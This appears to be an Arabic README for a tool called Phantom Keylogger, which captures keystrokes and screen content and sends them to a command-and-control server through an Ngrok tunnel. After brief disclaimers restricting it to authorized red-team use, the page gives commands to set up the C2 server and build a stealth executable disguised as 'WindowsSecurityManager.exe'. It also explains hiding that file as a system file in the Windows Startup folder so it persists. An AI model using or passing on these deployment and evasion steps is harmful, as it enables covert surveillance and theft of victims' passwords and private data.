
Phantom Keylogger هو نظام متقدم لتجميع معلومات ضغطات المفاتيح والاستخبارات البصرية مع تمكين خاصية التخفي.
Phantom Keylogger هو نظام متقدم لجمع معلومات ضغطات المفاتيح والمراقبة البصرية مع تمكين التخفي. صُمم بهدف الأمن التشغيلي باعتباره الأولوية الأساسية، وتوفر هذه الأداة قدرات مراقبة مستمرة مع الحفاظ على بصمة دنيا على الأنظمة المستهدفة أثناء مهام الفرق الحمراء المصرح بها.
حالات الاستخدام المصرح بها:
- عمليات اختبار الاختراق المصرح بها
- تمارين الفريق الأحمر مع قواعد اشتباك مكتوبة
- البحث الأمني في بيئات خاضعة للتحكم
- التحقق من ضوابط الأمن الدفاعي
العمليات المحظورة:
- أنشطة المراقبة غير المصرح بها
- الاختراق غير القانوني أو استخراج البيانات
- انتهاك خصوصية الأفراد
- أي عمليات هجومية غير مصرح بها
يتحمل المشغلون المسؤولية القانونية الكاملة عن النشر السليم
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger
# 2. Install operational dependencies
pip install -r requirements.txt
# 3. Deploy C2 server
python server.py
# Generate stealth executable
python build.py
المخرجات: dist/WindowsSecurityManager.exe
طرق التسليم:
# Start the GUI interface
python manager.py
┌─────────────────┐ ┌──────────────────┐ ┌─────────────────┐
│ TARGET │ │ C2 TUNNEL │ │ OPERATOR │
│ │ │ │ │ │
│ ┌─────────────┐│ │ ┌─────────────┐ │ │ ┌─────────────┐│
│ │ Stealth ││ │ │ Ngrok │ │ │ │ Management ││
│ │ Keylogger ├───────►│ Tunnel ├───────►│ Console ││
│ │ ││ │ │ │ │ │ │ ││
│ └─────────────┘│ │ └─────────────┘ │ │ └─────────────┘│
└─────────────────┘ └──────────────────┘ └─────────────────┘
مجلد بدء التشغيل: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
يمكن الوصول إليه بسهولة عن طريق كتابة shell:startup في مربع الحوار (WIN+r)
اسم الملف: WindowsSecurityManager.exe
السمات: ملف نظام مخفي